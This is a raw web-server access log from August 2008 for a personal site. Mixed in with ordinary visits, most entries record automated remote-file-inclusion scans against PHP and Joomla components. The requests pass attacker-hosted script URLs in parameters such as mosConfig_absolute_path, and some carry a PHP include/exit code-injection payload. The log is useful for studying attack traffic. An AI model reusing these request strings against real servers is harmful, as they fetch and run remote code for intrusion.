76.119.158.177 - - [12/Aug/2008:09:00:19 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=c3a6337a9f8133559889c38177602f56&showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:00:31 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:00:32 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:00:34 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 200 18597 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:00:40 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.48.41.130 - - [12/Aug/2008:09:00:45 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://primeraconchali.cl/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.17.183 - - [12/Aug/2008:09:00:50 -0700] "GET /bikes/dteel/EQ2/Screenshots/?N=D HTTP/1.0" 200 7100 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:00:59 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
67.205.67.205 - - [12/Aug/2008:09:01:18 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:01:18 -0700] "GET /logs/access_080321.log//index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:01:20 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.67.205 - - [12/Aug/2008:09:01:20 -0700] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18599 "-" "libwww-perl/5.805" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:01:20 -0700] "GET //index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 200 18387 "-" "libwww-perl/5.64" "www.dmulk.com"
212.150.247.23 - - [12/Aug/2008:09:01:22 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://makemoneymania.info/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
212.150.247.23 - - [12/Aug/2008:09:01:22 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://makemoneymania.info/.../rid???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
62.231.161.4 - - [12/Aug/2008:09:01:22 -0700] "GET /logs//index.php?loc=&cat=http://ugtcajamadrid.org/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:01:27 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 200 18531 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:01:27 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:01:32 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:01:35 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:01:37 -0700] "GET /logs/access_080404.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:01:50 -0700] "GET /logs/index2.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:01:50 -0700] "GET /index2.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:01:59 -0700] "GET /logs/access.log//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:02:00 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:02:00 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:09:02:11 -0700] "GET /logs/access_080122.log/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:09:02:13 -0700] "GET /?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 18483 "-" "libwww-perl/5.79" "www.dmulk.com"
64.49.254.139 - - [12/Aug/2008:09:02:13 -0700] "GET /logs/?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 200 60283 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:02:24 -0700] "GET /logs/xGB.php?act=admin&do=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:02:24 -0700] "GET /xGB.php?act=admin&do=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:02:32 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:02:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:02:36 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:03:32 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:03:34 -0700] "GET /logs/access.log//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:03:41 -0700] "GET /logs/access.log//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:03:42 -0700] "GET //citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:03:42 -0700] "GET /logs//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:03:57 -0700] "GET /logs//pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:03:58 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:04:03 -0700] "GET /logs/access_080329.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:04:04 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 18487 "-" "libwww-perl/5.812" "www.dmulk.com"
64.15.159.85 - - [12/Aug/2008:09:04:05 -0700] "GET //pollphp/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.posmac.nl/templates/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:04:10 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:04:12 -0700] "GET /logs/access_080401.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:04:13 -0700] "GET /logs/access_080404.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:04:17 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.67.242 - - [12/Aug/2008:09:04:24 -0700] "GET /logs/access_080329.log%20//include/init.inc.php?CPG_M_DIR=http://www.shopbijou.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:04:32 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:38 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:04:39 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:04:45 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:04:48 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:05:10 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:05:15 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:05:17 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:05:19 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
208.99.194.216 - - [12/Aug/2008:09:05:25 -0700] "GET /logs/access.log//errors.php?error=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:05:33 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:05:52 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:05:53 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:05:53 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.67.220 - - [12/Aug/2008:09:05:55 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.geocities.com/doni_they/bot/ids.txt?? HTTP/1.1" 200 18531 "-" "libwww-perl/5.812" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:03 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:03 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:04 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:09:06:04 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dogshop.at/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:09:06:04 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dogshop.at/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:09:06:04 -0700] "GET /logs/access_080401.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dogshop.at/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:06:17 -0700] "GET /logs/main.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.19.90.90 - - [12/Aug/2008:09:06:17 -0700] "GET /main.php?x=http://www.devilhouse.org/dhwm/alb2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [12/Aug/2008:09:06:24 -0700] "GET /logs/access_080302.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.dogshop.at/poll/osid6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:27 -0700] "GET /logs/access_080401.log//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:27 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:27 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:06:30 -0700] "GET /logs//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:06:31 -0700] "GET //ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
12.189.32.39 - - [12/Aug/2008:09:06:32 -0700] "GET /blog/wp-content/gallery/pre-westoc-2008/img_0139_0.jpg HTTP/1.1" 200 344118 "http://www.vfrdiscussion.com/forum/index.php?s=2920d1d55ed2d7b0d13d5e53d0a194d8&showtopic=36984" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.10) Gecko/20070216 Firefox/1.5.0.10" "dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:06:33 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:06:35 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:06:36 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
82.194.76.177 - - [12/Aug/2008:09:06:49 -0700] "GET /logs/access_080320.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:09:06:55 -0700] "GET /logs//inc/download_center_lite.inc.php?script_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.42.218.66 - - [12/Aug/2008:09:06:55 -0700] "GET //inc/download_center_lite.inc.php?script_root=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:58 -0700] "GET /logs/access_080224.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:06:58 -0700] "GET /logs/access_080103.log//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:58 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:58 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:59 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:59 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:06:59 -0700] "GET //ashnews.php?pathtoashnews=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:07:16 -0700] "GET /logs//ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.50.212 - - [12/Aug/2008:09:07:17 -0700] "GET //ashnews.php?pathtoashnews=http://pa-lavvenireprato.it/administrator/components/com_remository/images/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:07:33 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.199.235.196 - - [12/Aug/2008:09:07:33 -0700] "POST /blog/wp-admin/admin-ajax.php HTTP/1.1" 200 203 "http://dmulk.com/blog/wp-admin/post.php?action=edit&post=163&message=4" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" "dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:07:33 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:07:55 -0700] "GET /logs/access_080122.log/errors.php?error=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:07:55 -0700] "GET /errors.php?error=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
205.234.193.81 - - [12/Aug/2008:09:07:55 -0700] "GET /logs/errors.php?error=http://christianserna.net/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:07:59 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
83.64.132.254 - - [12/Aug/2008:09:08:13 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:17 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:17 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.198.149.178 - - [12/Aug/2008:09:08:17 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
